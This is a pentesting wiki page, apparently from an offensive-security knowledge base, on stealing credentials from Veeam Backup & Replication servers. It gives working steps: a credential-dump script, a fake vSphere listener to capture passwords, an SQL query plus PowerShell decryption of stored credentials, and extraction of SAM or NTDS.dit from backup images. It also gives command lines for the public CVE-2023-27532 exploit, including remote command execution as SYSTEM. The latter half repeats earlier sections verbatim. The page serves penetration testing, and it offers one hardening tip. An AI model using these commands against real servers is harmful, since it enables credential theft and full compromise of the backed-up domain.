Veeam Backup

MITRE ATT&CK™ Credential Access - Tactic TA0006

Theory

Veeam Backup & Recplication is a widely used tool for backing up virtual environments built on VMware vSphere, Nutanix AHV, and Microsoft Hyper-V hypervisors. If you manage to compromise the Veeam Backup & Replication serveur, you can extract passwords and hashes from its database or from the machines that are backed up

Veam servers used for the backup should not be joined to the domain, so when attackers compromise the domain, they can't destroy your backup.

Practice

Credentials Dump

Veeam requires the username and password for any machine you want to back it up. The user provided should have high privileges on the machine, so usually, if you're going to backup the domain devices, you will put administrator creds. Veeam stores these creds on MS-SQL using ProtectedData.Protect method of CryptoAPI. You can easily extract them if you have admin privilege on the Veeam Server.

You can do this step by running the veeam-creds script and extract passwords.

.\Veeam-Get-Creds.ps1

If you are able to connect to the Veeam console and you have the right to create new connections to the hypervisor. You can have Veeam connect to a fake vSphere host.

It doesn’t matter if the console is running on the same host or on a different one.

First, run veampot.py on your attacking machine

python3 veampot.py

Then, create a new connection to the vSphere server in the Veeam console in the Inventory section;
Enter the address of the machine with the running script specifying the connection port 8443;
Select the required account and complete the wizard.
Finlay, get password in script output.

From SQL management studio (of any SQL management interface access method) run the following again the veeam managemnt database:

SELECT TOP (1000) [id] 
,[user_name] 
,[password] 
,[usn] 
,[description] 
,[visible] 
,[change_time_utc] 
FROM [VeeamBackup].[dbo].[Credentials]

This will dumpt the password hashes. Copy them and then run a PowerShell interface

Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll" 

$encoded = 'INSERT_HASH_HERE' 

[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)

Backup Machines - Hashes Extraction

If you can access a backup image, you can restore it on your local disk. More interesting, we can use the Veam individual files recover feature. Depending on the server backup type, you may extract SAM and LSA secrets from registry hives or even the NTDS.dit file if it's a domain controller. Check this section for more information about credentials dumping.

When you have a valid backup image, Veeam provides a restore mechanism by "VBK Extract". You can exfiltrate the backup images and extract the backup in multiple extensions like VMDM, VHD, or VHDX on your attacking host.

#Before, copy backups files in the current directory
#VBK Extract on linux
tar -zxvf VeamExtract*
./extract

We can then create a new VM from this files or mount it to our disk to recover sensitive files.

Unauthenticated Credentials Dump & RCE - CVE-2023-27532

Vulnerability CVE-2023-27532 in a Veeam Backup & Replication component allows an unauthenticated user operating within the backup infrastructure network perimeter to obtain encrypted credentials stored in the configuration database or perform remote code execution.

Any Veeam Backup & Replication version prior to V12 (build 12.0.0.1420 P20230223) and V11a (build 11.0.1.1261 P20230227) is vulnerable.

We may use the sfewer-r7's exploit (C#) to dump credentials from a remote Veeam server.

VeeamHax.exe --target <VEAM_IP>

Alternatively, we may use this exploit (C#) from horizon3ai.

CVE-2023-27532.exe net.tcp://<VEAM_IP>:9401/

We may use the sfewer-r7's exploit (C#) to run an arbitrary command with local system privileges on the remote Veeam server.

VeeamHax.exe --target 192.168.0.100 --cmd calc.exe

References

Veeam Backup & “Penetration” — Getting the most out of PenTestMedium

Retrieving Passwords From Veeam Backup ServersPwnDefend

https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.htmforums.veeam.com

Last updated 1 year ago

Was this helpful?

Theory

Veam servers used for the backup should not be joined to the domain, so when attackers compromise the domain, they can't destroy your backup.

Practice

Credentials Dump

You can do this step by running the veeam-creds script and extract passwords.

.\Veeam-Get-Creds.ps1

If you are able to connect to the Veeam console and you have the right to create new connections to the hypervisor. You can have Veeam connect to a fake vSphere host.

It doesn’t matter if the console is running on the same host or on a different one.

First, run veampot.py on your attacking machine

python3 veampot.py

Then, create a new connection to the vSphere server in the Veeam console in the Inventory section;
Enter the address of the machine with the running script specifying the connection port 8443;
Select the required account and complete the wizard.
Finlay, get password in script output.

From SQL management studio (of any SQL management interface access method) run the following again the veeam managemnt database:

SELECT TOP (1000) [id] 
,[user_name] 
,[password] 
,[usn] 
,[description] 
,[visible] 
,[change_time_utc] 
FROM [VeeamBackup].[dbo].[Credentials]

This will dumpt the password hashes. Copy them and then run a PowerShell interface

Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll" 

$encoded = 'INSERT_HASH_HERE' 

[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)

Backup Machines - Hashes Extraction

#Before, copy backups files in the current directory
#VBK Extract on linux
tar -zxvf VeamExtract*
./extract

We can then create a new VM from this files or mount it to our disk to recover sensitive files.

Unauthenticated Credentials Dump & RCE - CVE-2023-27532

We may use the sfewer-r7's exploit (C#) to dump credentials from a remote Veeam server.

VeeamHax.exe --target <VEAM_IP>

Alternatively, we may use this exploit (C#) from horizon3ai.

CVE-2023-27532.exe net.tcp://<VEAM_IP>:9401/

We may use the sfewer-r7's exploit (C#) to run an arbitrary command with local system privileges on the remote Veeam server.

VeeamHax.exe --target 192.168.0.100 --cmd calc.exe